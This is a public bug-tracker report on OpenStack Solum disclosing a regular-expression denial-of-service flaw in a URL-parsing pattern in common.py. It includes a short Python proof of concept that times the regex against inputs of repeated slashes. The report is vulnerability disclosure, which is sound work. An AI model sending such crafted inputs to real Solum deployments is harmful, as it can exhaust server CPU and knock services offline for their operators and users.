Redos in at common.py#L20

Bug #2047505 reported by lujiefsi
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Solum
New
Undecided
Unassigned

Bug Description

Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos.

vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/common.py#L20

poc is here:

```

import re
import datetime

pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')
def split(x):
  data = 'https://git' + '/' * x
  starttime = datetime.datetime.now()
  pt.search(data)
  endtime = datetime.datetime.now()
  print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds")

split(3)
split(30)
split(300)
split(3000)
```

lujiefsi (lujiefsi)
description: updated
lujiefsi (lujiefsi)
summary: - Redos in
- https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104
+ Redos in at language_pack_handler.py#L104
description: updated
summary: - Redos in at language_pack_handler.py#L104
+ Redos in at common.py#L20
description: updated
lujiefsi (lujiefsi)
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.